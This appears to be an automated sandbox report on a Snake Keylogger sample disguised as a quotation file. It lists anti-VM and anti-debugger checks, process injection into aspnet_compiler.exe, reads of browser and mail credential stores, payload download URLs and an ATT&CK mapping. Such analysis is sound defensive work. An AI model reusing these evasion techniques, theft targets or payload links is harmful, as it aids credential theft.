            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7892Thread sleep time: -594187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 99875Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 99764Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 99656Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 99547Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 99422Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 99313Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 99188Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 99073Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 98936Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 98827Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 98615Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 98403Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 98282Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 98141Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 98031Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 97922Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 97813Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 97703Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 97594Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 97485Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 97360Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 97235Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 97110Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 96985Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 96860Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 96735Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 96610Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 96485Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 96360Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 96235Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 96110Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 95985Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 95780Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 95646Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 95516Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 595968Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 595747Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 595516Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 595188Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598797Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598576Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598452Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598333Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598156Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597886Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597765Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597546Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597437Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597218Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597109Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596999Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596890Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596671Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596343Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596234Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596124Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596015Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595905Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595792Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595653Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595543Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595387Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595172Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594843Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594625Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594515Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594406Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594296Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594187Jump to behavior
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6CF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-CH:VMware|VIRTUAL|A M I|Xen
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6CF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-CH:Microsoft|VMWare|Virtual
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6CF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6CF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2224780699.00000228FF3E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6CF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6D71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: explorer SbieDll.dll!cuckoomon.dll"win32_process.handle='{0}'#ParentProcessId$cmd%select * from Win32_BIOS8Unexpected WMI query failure&version'SerialNumber)VMware|VIRTUAL|A M I|Xen*select * from Win32_ComputerSystem+manufacturer,model-Microsoft|VMWare|Virtual.john/anna0xxxxxxxx
            Source: aspnet_compiler.exe, 00000004.00000002.2959731204.000001904F01A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeCode function: 0_2_00007FFD9BAB1535 CheckRemoteDebuggerPresent,0_2_00007FFD9BAB1535
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Creates a thread in another existing process (thread injection)
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeThread created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe EIP: 4EEC0000Jump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 1904EEC0000Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeQueries volume information: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 4.2.aspnet_compiler.exe.19060c900e8.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.aspnet_compiler.exe.19050ae0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.aspnet_compiler.exe.19050ae0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.aspnet_compiler.exe.19060c900e8.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.2961287104.0000019050ECE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2961287104.0000019050C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7792, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 4.2.aspnet_compiler.exe.19060c900e8.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.aspnet_compiler.exe.19050ae0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.aspnet_compiler.exe.19050ae0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.aspnet_compiler.exe.19060c900e8.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.2961287104.0000019050ECE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2961287104.0000019050C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7792, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		211
            Process Injection            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            Query Registry            		Remote Services1
            Email Collection            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            Scheduled Task/Job            		51
            Virtualization/Sandbox Evasion            		LSASS Memory221
            Security Software Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		211
            Process Injection            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
            Obfuscated Files or Information            		NTDS51
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Software Packing            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials1
            System Network Configuration Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559133 Sample: QUOTATION_NOVQTRA071244PDF.... Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 18 reallyfreegeoip.org 2->18 20 s24.filetransfer.io 2->20 22 3 other IPs or domains 2->22 30 Found malware configuration 2->30 32 Malicious sample detected (through community Yara rule) 2->32 34 Multi AV Scanner detection for submitted file 2->34 38 5 other signatures 2->38 8 QUOTATION_NOVQTRA071244PDF.scr.exe 14 2 2->8         started        signatures3 36 Tries to detect the country of the analysis system (by using the IP) 18->36 process4 dnsIp5 24 filetransfer.io 188.114.96.3, 443, 49730, 49731 CLOUDFLARENETUS European Union 8->24 26 reallyfreegeoip.org 188.114.97.3, 443, 49732, 49740 CLOUDFLARENETUS European Union 8->26 40 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->40 42 Writes to foreign memory regions 8->42 44 Creates a thread in another existing process (thread injection) 8->44 46 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 8->46 12 aspnet_compiler.exe 14 3 8->12         started        signatures6 process7 dnsIp8 28 checkip.dyndns.com 193.122.6.168, 49739, 49742, 49745 ORACLE-BMC-31898US United States 12->28 48 Tries to steal Mail credentials (via file / registry access) 12->48 50 Tries to harvest and steal browser information (history, passwords, etc) 12->50 16 conhost.exe 12->16         started        signatures9 process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            QUOTATION_NOVQTRA071244PDF.scr.exe37%ReversingLabsWin64.Trojan.Znyonm

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.microsoft.coH0%Avira URL Cloudsafe
            https://s24.filetransfer.io/storage/download/ndvzPJWaMUSB0%Avira URL Cloudsafe
            https://s24.filetransfer.io0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            s24.filetransfer.io
            		188.114.97.3
            		truefalse
              		unknown
              filetransfer.io
              		188.114.96.3
              		truefalse
                		high
                reallyfreegeoip.org
                		188.114.97.3
                		truefalse
                  		high
                  checkip.dyndns.com
                  		193.122.6.168
                  		truefalse
                    		high
                    checkip.dyndns.org
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://checkip.dyndns.org/false
                        		high
                        https://s24.filetransfer.io/storage/download/ndvzPJWaMUSBfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://filetransfer.io/data-package/I7fmQg9d/downloadfalse
                          		high
                          https://reallyfreegeoip.org/xml/8.46.123.75false
                            		high
                            https://filetransfer.io/data-package/I7fmQg9d/downloadfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.microsoft.coHaspnet_compiler.exe, 00000004.00000002.2960737490.0000019050B9C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://github.com/mgravell/protobuf-netiQUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://stackoverflow.com/q/14436606/23354QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6D71000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/mgravell/protobuf-netJQUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://reallyfreegeoip.org/xml/8.46.123.75paspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://stackoverflow.com/q/11564914/23354;QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://stackoverflow.com/q/2152978/23354QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://checkip.dyndns.org/qaspnet_compiler.exe, 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmpfalse
                                            		high
